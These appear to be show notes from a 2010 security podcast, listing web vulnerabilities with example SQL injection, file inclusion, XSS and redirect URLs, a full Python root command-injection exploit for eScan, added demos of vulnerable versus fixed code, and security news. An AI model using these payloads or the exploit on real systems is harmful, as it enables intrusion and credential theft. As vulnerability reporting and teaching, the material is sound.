Your daily source of Pwnage, Policy and Politics.

Episode 94 – The Return of Shoe

ISD Podcast Episode 94 for March 24, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. Webmatic is subject to a cross-site scripting vulnerability. The flaw exists because the application does not validate multiple variables and form fields submitted to the ‘index.php’ script. An attacker could create a specially crafted URL that executes arbitrary script code in a user’s browser within the trust relationship between the browser and the server, leading to a loss of integrity. Version 3.0.3 is affected; prior versions may be affected as well. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URL.
  2. Fw-BofF (oolime-resurrection) is subject to multiple file inclusion vulnerabilities, both remote and local. Version 1.5.3beta is affected; prior versions may be affected as well. Example RFI URL is available:

    http://www.sample.com/core/dispatcher.php?configRootDir=[Shell]

    Example LFI URL is available: http://www.sample.com/core/database.php?configDBchoice=[LFI%00]

  3. The PHP-Kit b-day.php add-on is subject to a SQL injection vulnerability because the application fails to sufficiently sanitize user-supplied input used in a query. Example URL is available:

    http://www.sample.com/include.php?path=bday.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1--

  4. PowieSys is subject to a SQL injection vulnerability in the ‘shownews’ parameter of index.php. Version 0.7.7 alpha and all prior versions are affected. Example URL is available:

    http://www.sample.com/news/index.php?shownews=999999'+union+select+1,2,3,4,concat(nickname,0x3a,pwd,0x3a,email),6,7,8,9,10,11,12,13+from+powie_pfuser+where+id=1--+

  5. Aris AGX agXchange ESM is subject to an open redirection vulnerability: the ‘returnpage’ parameter is not validated, so a user who follows a malicious link is redirected to an attacker-chosen site. Example URL is available:

    http://www.sample.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com

  6. Yupi CMS is subject to a remote file inclusion (RFI) vulnerability. An attacker can supply the location of a remote file in the ‘clientDir’ parameter and have it included and executed in the context of the web server. Version 0.44 is affected. Example URL is available:

    http://www.sample.com/filemanager/connectors/php/config.php?clientDir=[inj3ct0r]

  7. RepairShop2 is subject to a Cross Site Scripting vulnerability. This flaw exists because the application does not validate multiple variables and form fields upon submission. Version 1.9.023 is impacted.  Example URL is available:

    http://www.sample.com/shop/?b=products.details&prod=[INDONESIANCODER]

  8. Zephyrus CMS is subject to a remote SQL injection vulnerability. The flaw exists because the application fails to sufficiently sanitize user-supplied input used in a SQL query. Example URL is available:

    http://www.sample.com/index.php?pagina=news&id=[SQL Injection]

  9. Xataface is subject to an admin authentication bypass vulnerability. Exploiting it could allow an attacker to edit, delete or create records in the database, create new admin accounts, and view all users and passwords. Example URL is available:

    http://www.sample.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list

  10. Multiple MicroWorld eScan products are vulnerable to a remote command execution vulnerability because they fail to properly sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary commands with superuser privileges; successful attacks completely compromise affected computers. The issue affects versions prior to 4.1.x of the following products: eScan for Linux Desktop, eScan for Linux File Servers, MailScan for Linux Mailservers and WebScan for Linux Proxy Servers. Exploit code is available:
    #!/usr/bin/env python3
    import sys
    from socket import socket, AF_INET, SOCK_STREAM

    # author: Mohammed almutairi
    # (Sa.attacker@gmail.com)
    """
    MicroWorld eScan Antivirus < 3.x  Remote Root Command Execution
    Package MWADMIN package vulnerabilities (linux)
    The Base Packages (MWADMIN and MWAV) must be installed before eScan
    Link:

    http://www.escanav.com/english/content/products/escan_linux/linux_products.asp

    infected: all version 3.X eScan linux
    1-Escan for Linux Desktop
    2-Escan for Linux file Servers
    3-MailScan for Linux and webscan
    Tested On RedHat and Fedora
    ULTRA PRIV8 :)

    Description:

    From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
    include("common_functions.php");  <--> (1)

    if ($_POST['forgot'] == "Send Password")
    {
    $user = $_POST["uname"]; <-->(2) insecure :(

    vulnerable code in forgotpassword.php and common_functions.php
    in (1) $runasroot = "/opt/MicroWorld/sbin/runasroot";
    we can inject through the file forgotpassword.php, as you can see at (2),
    giving remote root command execution
    >> eScan.py www.***.com
    eScan@/bin/sh:$Sa$ => reboot
    [*] Done! sent to: www.***.com
    """


    def xpl():
        if len(sys.argv) < 2:
            print("[*] MicroWorld eScan Antivirus Remote Root Command Execution")
            print("[*] exploited by Mohammed almutairi")
            print("[*] usage: %s host" % sys.argv[0])
            return

        host = sys.argv[1]
        port = 10080  # default port of the eScan web administration interface
        cmd = input("eScan@/bin/sh:$Sa$ => ")
        sock = socket(AF_INET, SOCK_STREAM)
        sock.connect((host, port))
        # Run the chosen command as root through eScan's own runasroot helper.
        sh = "/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'" % cmd

        # The ';' characters close the command that forgotpassword.php builds
        # around $user at (2) and splice ours in; see the description above.
        sa = "uname=;%s;" % sh
        sa += "&forgot=Send+Password"

        s = "POST /forgotpassword.php HTTP/1.1\r\n"
        s += "Host: %s:%d\r\n" % (host, port)
        s += "User-Agent: */*\r\n"
        s += "Accept: ar,en-us;q=0.7,en;q=0.3\r\n"
        s += "Content-Type: application/x-www-form-urlencoded\r\n"
        s += "Content-Length: %d\r\n\r\n" % len(sa)
        s += sa

        sock.sendall(s.encode())
        print("[*] Done! sent to: %s" % host)
        sock.close()


    if __name__ == "__main__":
        xpl()
        sys.exit(0)

  11. The ‘com_jresearch’ component for Joomla! is subject to a local file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL is available:

    http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00

  12. Astaro Security Linux is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The issue affects Astaro Security Linux 5; other versions may also be affected. Example POST data is available:

    username=my@example.com&password=DTC&SID=>"><script>alert("XSS !!!")</script>&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0

  13. Uiga Fan Club, Personal Portal and Business Portal are subject to a SQL injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in a SQL query. Exploiting this issue could allow an attacker to compromise the applications, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL is available:

    http://www.sample.com/forum/uigabusinessportal/index.php?view=photos&id=1+union+select+1,2,concat(user_id,0x3a,username,0x3a,password),4,5+from+tbl_user+where+user_id=1n--
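
Items 3, 4, 8 and 13 above are all the same UNION-based SQL injection. What follows is an added example, not code from the podcast or from any of the affected projects: a small Python script that reproduces the bug pattern behind item 4 against an in-memory SQLite database (assumed table layout, constructed rows), runs a payload in the style of the example URLs through a vulnerable query and through a parameterised one, and shows the difference. SQLite has no concat()/0x3a, so the payload spells the nickname:pwd concatenation with || and ':' instead of the MySQL form in the advisories.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the powie_pfuser table named in item 4 (assumed
# columns; the real schema is not on this page). Hashes are just sample text.
CONSTRUCTED_USERS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99", "admin@example.invalid"),
    (2, "alice", "e99a18c428cb38d5f260853678922e03", "alice@example.invalid"),
]
CONSTRUCTED_NEWS = [(1, "Welcome", "First post"), (2, "Release 0.7.7", "Alpha is out")]

# Same shape as the item 4 URL: a quote to close the literal, a UNION SELECT
# with the same column count as the original query, and a trailing '--+'
# (the '+' decodes to the space MySQL requires after '--') to comment out the
# quote the script appends. Written in SQLite syntax so the demo runs offline.
PAYLOAD_URL = "999999'+union+select+1,nickname||':'||pwd,email+from+powie_pfuser+where+id=1--+"


def make_db():
    """Build an in-memory SQLite database with the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE powie_pfuser (id INTEGER, nickname TEXT, pwd TEXT, email TEXT)")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    con.executemany("INSERT INTO powie_pfuser VALUES (?, ?, ?, ?)", CONSTRUCTED_USERS)
    con.executemany("INSERT INTO news VALUES (?, ?, ?)", CONSTRUCTED_NEWS)
    return con


def decode_param(raw):
    """What the web server hands the script: '+' and %xx already decoded."""
    return unquote_plus(raw)


def shownews_vulnerable(con, shownews):
    """The bug pattern: the parameter is pasted into the SQL text, so the quote
    in the payload closes the literal and the UNION SELECT appends rows from
    whatever table the attacker names."""
    sql = "SELECT id, title, body FROM news WHERE id='%s'" % shownews
    return con.execute(sql).fetchall()


def shownews_fixed(con, shownews):
    """Parameterised query: the value travels out of band and is only ever
    compared against the id column, never parsed as SQL."""
    return con.execute("SELECT id, title, body FROM news WHERE id=?", (shownews,)).fetchall()


def demo():
    """Run the decoded payload through both versions and a normal id through the fixed one."""
    con = make_db()
    param = decode_param(PAYLOAD_URL)
    return {
        "vulnerable": shownews_vulnerable(con, param),
        "fixed_with_payload": shownews_fixed(con, param),
        "fixed_normal": shownews_fixed(con, "1"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable query returns the admin nickname:hash row from the user table even though no news item 999999 exists; the parameterised query returns nothing for the same input and still returns the right row for an ordinary id.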
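
Item 10's exploit works because forgotpassword.php splices $_POST["uname"] into a command string that a shell then parses. This is an added example, neither the vendor's code nor the exploit author's: the same pattern in Python, with echo standing in for the privileged runasroot command (the WRAPPER string and the INJECTED_UNAME value are constructed for the demo), beside two ways to close the hole: quoting for a shell you cannot avoid, and validating the field and calling the program with an argv list so no shell is involved at all.

```python
import re
import shlex
import subprocess

# Hypothetical stand-in for the privileged mail command that forgotpassword.php
# runs through /opt/MicroWorld/sbin/runasroot; echo keeps the demo harmless.
WRAPPER = "echo sending-password-to"

# Constructed attacker input in the shape the exploit above sends as uname=
INJECTED_UNAME = ";echo INJECTED;"


def forgot_password_vulnerable(uname):
    """Mirrors the bug: the POSTed uname is spliced into a command string that
    a shell parses. The ';' ends the intended command, so what follows runs too,
    with whatever privilege the wrapper has (root behind runasroot)."""
    cmd = "%s %s" % (WRAPPER, uname)
    return subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True).stdout


def forgot_password_quoted(uname):
    """If a shell really is unavoidable, quote the value so the shell sees one
    word; the metacharacters become literal text inside the argument."""
    cmd = "%s %s" % (WRAPPER, shlex.quote(uname))
    return subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True).stdout


def is_valid_username(uname):
    """Allowlist the only shape a user name can have; reject everything else."""
    return re.fullmatch(r"[A-Za-z0-9._-]{1,64}", uname) is not None


def forgot_password_fixed(uname):
    """The preferred fix: validate first, then pass an argv list with no shell,
    so there is nothing left to inject into."""
    if not is_valid_username(uname):
        raise ValueError("invalid user name")
    argv = shlex.split(WRAPPER) + [uname]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(forgot_password_vulnerable(INJECTED_UNAME))
    print(forgot_password_quoted(INJECTED_UNAME))
    print(is_valid_username(INJECTED_UNAME), forgot_password_fixed("alice"))
```

Against the vulnerable function the injected second command runs and prints INJECTED on its own line; the quoted version prints the whole uname as harmless text; the fixed version refuses the input outright and, for a real user name, never gives a shell the chance to interpret it.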
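
Items 2 and 11 are file inclusion bugs, and item 11's example URL shows both tricks at once: ten ../ to walk out of the include directory, and a trailing %00 so the .php suffix the script appends is cut off. This is an added example, not Joomla or com_jresearch code: a Python model of what the vulnerable include path computation does (BASE and PAYLOAD are constructed; the include root is assumed) and a hardened resolver that rejects NUL bytes, accepts only a bare identifier (which also rules out the http:// form used for RFI in items 2 and 6) and confirms the resolved path stays under the root.

```python
import os
import re
from urllib.parse import unquote

# Assumed include root for the demo; the real component's layout is not on this page.
BASE = "/var/www/app/controllers"
SUFFIX = ".php"

# Constructed copy of the payload shape in item 11: ten ../ to reach /, then a
# %00 so that PHP's include() of the day, which stopped at the first NUL,
# never saw the ".php" the script appended.
PAYLOAD = "../" * 10 + "proc/self/environ%00"


def vulnerable_include_path(base, controller):
    """What the buggy component effectively does: decode the parameter, glue a
    suffix on, and hand the string to include(). split('\\x00')[0] reproduces
    the NUL truncation that made the suffix useless."""
    name = unquote(controller)
    raw = os.path.normpath(os.path.join(base, name + SUFFIX))
    return raw.split("\x00")[0]


def resolve_include(base, controller):
    """Hardened version: reject NULs, accept only a bare identifier (no '/',
    no '..', no 'http://'), and still confirm the resolved path is under the
    include root in case the allowlist is ever loosened."""
    name = unquote(controller)
    if "\x00" in name:
        raise ValueError("NUL byte in include name")
    if not re.fullmatch(r"[A-Za-z0-9_]+", name):
        raise ValueError("include name must be a bare identifier")
    root = os.path.realpath(base)
    path = os.path.realpath(os.path.join(root, name + SUFFIX))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("include escapes the include root")
    return path


def is_safe_include(base, controller):
    """True when resolve_include accepts the name, False when it rejects it."""
    try:
        resolve_include(base, controller)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(vulnerable_include_path(BASE, PAYLOAD))
    print(is_safe_include(BASE, PAYLOAD), is_safe_include(BASE, "news"))
```

The vulnerable computation ends up at /proc/self/environ, which is exactly why that payload was popular: the environment of the web server process echoes back the request headers, giving a place to plant PHP code. The hardened resolver rejects the payload and a remote URL alike while still resolving an ordinary controller name.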

Stories of Interest:
News item 1: http://fcw.com/articles/2010/03/19/einstein-3-test-intrusion-prevention-system.aspx
The Homeland Security Department plans to partner with a commercial Internet Service Provider and another government agency to pilot technology developed by the National Security Agency to automate the detection of cyber intrusions into civilian agencies’ systems, making it possible to thwart the attacks before damage is done.

The new technologies and automated processes of Einstein 3 are improvements over Einstein 1 and 2 technology, DHS officials said. Einstein 3’s predecessors focused on intrusion detection, allowing analysts to scan records of connections to agencies’ systems and use signatures to scan network traffic for cyber threats. Einstein 3 would add the ability to prevent those intrusions.

Einstein 3 also would improve information sharing by DHS’ U.S. Computer Emergency Readiness Team (US-CERT), allowing the department to automate the process for sending alerts about detected network intrusions.

News item 2: http://norton.newslinevine.com/

If you live in Seattle, Boston, Washington, D.C., San Francisco, or Raleigh, N.C., then you’re in one of the top five riskiest cities when it comes to cybercrime.

But it’s not where you live that makes it more dangerous; it’s the type of activities that people in these cities tend to engage in, according to Symantec Internet safety advocate Marian Merritt.

“Some of the common factors for residents of those cities would be highly educated, affluent, a lot of people using tech all day long in a variety of fashions,” Merritt said. “It’s those activities that have more to do with increasing their risk than the ZIP code that they live in.”

The following are ranked the Norton Top 10 Riskiest Online Cities:

1.) Seattle
2.) Boston
3.) Washington, D.C.
4.) San Francisco
5.) Raleigh, N.C.
6.) Atlanta
7.) Minneapolis
8.) Denver
9.) Austin, Texas
10.) Portland, Ore.

News item 3: http://www.gao.gov/new.items/d10355.pdf

In a study (PDF) issued last week, the Government Accountability Office states that the IRS has corrected less than one-third of the 89 security weaknesses identified in its audit of the tax agency last year.

“While IRS has corrected 28 control weaknesses and program deficiencies, 61 of them — or about 69 percent — remain unresolved or unmitigated,” the report states. “For example, IRS continued to install patches in an untimely manner and used passwords that were not complex. In addition, IRS did not always verify that remedial actions were implemented, or effectively mitigate the security weaknesses.”

Weaknesses in IRS systems “continue to jeopardize the confidentiality, integrity, and availability of financial and sensitive taxpayer information,” the GAO says. “IRS did not consistently implement controls that were intended to prevent, limit, and detect unauthorized access to its systems and information.

“For example,” the report continues, “IRS did not always (1) enforce strong password management for properly identifying and authenticating users; (2) authorize user access to permit only the access needed to perform job functions; (3) log and monitor security events on a key system; and (4) physically protect its computer resources.”

A key reason for the slow resolution of the vulnerabilities is that the IRS has not yet fully implemented its agencywide IT security program to ensure controls are appropriately designed and operating effectively, the GAO says. The agency hasn’t been conducting annual reviews of risk assessments, for example, and it hasn’t been checking to ensure contractors received security awareness training.

“Until these control weaknesses and program deficiencies are corrected, the agency remains unnecessarily vulnerable to insider threats related to the unauthorized access to and disclosure, modification, or destruction of financial and taxpayer information, as well as the disruption of system operations and services,” the report says.

News item 4: http://www.wired.com/threatlevel/2010/03/gonzalez-gov-memo/
Albert Gonzalez should be sentenced to 25 years behind bars for leading a gang of cyberthieves who stole tens of millions of credit and debit card numbers from a transaction processor and several giant retail chains, federal prosecutors argued in a court filing.

“[T]he sentences would be the longest ever imposed in an identity theft case and among the longest imposed for a financial crime, which is appropriate because Gonzalez was at the center of the largest and most costly series of identity thefts in the nation’s history,” wrote Boston-based Assistant U.S. Attorney Stephen Heymann. “He knowingly victimized a group of people whose population exceeded that of many major cities and some states.”

The government also disputed a defense claim that Gonzalez suffers from Asperger’s disorder, a mild form of autism that was grounds for a slightly reduced sentence in a previous hacking prosecution.

Gonzalez, 28, is set for sentencing next week on three indictments covering virtually every headline-making bank-card theft in recent years, including intrusions at TJX, DSW Shoe Warehouse, Office Max, Hannaford Brothers, 7-Eleven, and Heartland Payment Systems, which alone exposed magstripe data on 130 million credit and debit cards. He performed the intrusions while an informant for the Secret Service.

News item 5:  http://www.wired.com/threatlevel/2010/03/gonzalez-salary/
Convicted TJX hacker Albert Gonzalez earned $75,000 a year working undercover for the U.S. Secret Service, informing on bank card thieves before he was arrested in 2008 for running his own multimillion-dollar card-hacking operation.

The information comes from one of Gonzalez’s best friends and convicted accomplices, Stephen Watt. Watt pleaded guilty last year to creating a sniffer program that Gonzalez used to siphon millions of credit and debit card numbers from the TJX corporate network while he was working undercover for the government.

Watt said that Gonzalez was paid in cash, which is generally done to protect someone’s status as a confidential informant. The Secret Service said it would not comment on payments made to informants.

“It’s a significant amount of money to pay an informant but it’s not an outrageous amount to pay if the guy was working full time and delivering good results,” says former federal prosecutor Mark Rasch. “It’s probably the only thing he was doing – other than hacking into TJX and making millions of dollars.”

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.
